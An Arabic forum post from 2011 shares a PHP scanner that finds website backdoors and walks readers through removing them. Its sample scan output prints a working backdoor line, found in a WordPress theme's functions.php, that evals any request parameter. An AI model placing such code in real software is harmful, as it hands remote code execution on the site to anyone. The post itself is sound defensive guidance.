أهلا وسهلا بك زائرنا الكريم في JO1R FORUM | منتديات شباب و صبايا الأردن، لكي تتمكن من المشاركة ومشاهدة جميع أقسام المنتدى وكافة الميزات ، يجب عليك إنشاء حساب جديد بالتسجيل بالضغط هنا أو تسجيل الدخول اضغط هنا إذا كنت عضواً .

سكريبت لكشف جزور الفيروسات في موقعك - يعمل بكفاءه عاليه

بسم الله الرحمن الرحيم انا الي فتره ما شاركت هنا بعد موضوعي شرح المفصل لعملية تغير اسم الدومين وتحويل الارشفه الي الدومين الجديد مع مثال حي اليوم عن



26-10-2011 06:00 مساءً
معلومات الكاتب ▼
تاريخ الإنضمام : 01-06-2011
رقم العضوية : 46,086
المشاركات : 3,000
الجنس :
قوة السمعة : 50
بسم الله الرحمن الرحيم
انا الي فتره ما شاركت هنا بعد موضوعي

شرح المفصل لعملية تغير اسم الدومين وتحويل الارشفه الي الدومين الجديد مع مثال حي

اليوم عندي موضوع مهم جدا جدا وعشان هيك حبيت اشاركه معكم

مشكلة الفيروسات في الموقع و قد يضر هذه الموقع بجهازكم
وانا هنا بتكلم عن الفايروسات الي بتزرع اكواد في index هيه عباره عن فيروسات مشفره
طبعا اسرع حل لهذه المشكله هو انك تحذف كل WWW وتركب نسخه اجديده من لسكريبتات وتربطها بقاعدة البيانات

لكن فيه ناس تانيه بتروح علي ملفات الاندكس وبتحذف منها الكود وبتنحل المشكله بدون ما يحذف كل المجلدات
لكن المصيبه انوا بعد 5 دقائق او يوم حتي بتلاقي الاكواد رجعت تاني !!! هاده لانوا بعض الفيروسات الجديده بكون الها اشي اسمه باب خلفي باك دور بيقدر منوا الفايروس انوا يرجع يكتب نفسوا في ملفاتك او حتي يعمل تحديث لنفسوا !!! :nosweat: تخيل انت مش خالص من الفايروس اروح ينزلك كل شويه نسخه احدث منوا :nosweat:

المهم الان للحل وهو اسكريبت بيعمل سكان للمساحه تبعتك بالكامل وبيعطيك موقع الباك دور عندك وبمجرد انك تحذفوا وتروح تحذف اكواد الاندكس فالفايروس مش حيرجع تاني

طبعا لسكريبت انا مستخدموا علي عشرات المواقع قبل كده ودايمن بيعطيني نتيجه حلوه

الشرح

1- حمل لسكريبت من المرفقات او من الرابط المباشر هناااااااا او من هنااااااااااااااا
2-فك الضغط وارفع ملف php علي www وافتحوا عن طريق المتصفح

اذا اعطاك النتيجه التاليه
رمز Code:
Basic Backdoor Script Finder by White Fir Design
Done
فهذه يعني انوا ما فيه باك دور في موقعك اتعرف عليهم لسكريبت فهناك احتمالين
1- ما في باك دور والفيروسات فقط في الاندكس احذفهم وانتهي الموضوع
2- موجود باك دور بس ما تعرف عليه اللسكريبت





اما اذا اعطاك نتيجه مثل
رمز Code:
Basic Backdoor Script Finder by White Fir Design
File: /home/hakijhhla/public_html/blog/wp-content/themes/twentyeleven/functions.php
String:: if (isset($_REQUEST[asc])) eval(stripslashes($_REQUEST[asc]));
Done
هاده بيعني انوا تم العثور علي باك دور في موقعك و مكان الباك دور هو
رمز Code:
File: /home/hakijhhla/public_html/blog/wp-content/themes/twentyeleven/functions.php
والباك دور هو الكود
رمز Code:
if (isset($_REQUEST[asc])) eval(stripslashes($_REQUEST[asc]));
الان كل ما عليك هو انك تروح علي ملف functions.php حتلاقي الكود في اول الصفحه علي الاكثر احذفوا و اعمل اسكان كمان مره بالسكريبت و المفروض يعطيك انوا انحلت المشكله

طبعا هذه الشرح للفيروسات الي بتكون بدايتها ب Base64 Decoder وما بيشملها كلها لكن لسكريبت اداه من الادوات الي ممكن تستخدمها

حقوقك لسكريبت لموقع White Fir Design - Web Design, Security, and Marketing والموقع جميل و ويوجد به محتوي مفيد


سامحونا علي ايه اخطاء في الموضوع وبنسبه لناس الي عندها مشكله في موقعها و عايزين انظف الموقع بنيابه عنهم بامكانك فتح تذكره او ارسل رساله الي بريدي lr2b.commailgmail.com لاني مش مرابط هنا في المنتدي :)




بعد التخلص من الباك دور يوجود الاكثير من الاشياء لتحسين حماية موقعك والاتاكد من عدم وجود ايه فيروسات متبقيه وقد شرح الاخوه هذه الكلام في مواضيع كثيره ارجوا الرجوع لها وعدم الاكتفاء بهذه لسكريبت


هذه الشرح لمن لديهم خلفيه بسيطه جدا عن php وليس للمبتدئين وانصح من يواجه نفس المشكله وليس لديه خبره بطلب المساعده من الاخرين

الملفات المرفقة zip basicbackdoorscriptfinder.zip (2.3 كيلوبايت)

اضافة رد جديد اضافة موضوع جديد




الكلمات الدلالية
لا يوجد كلمات دلالية ..









الساعة الآن 07:27 AM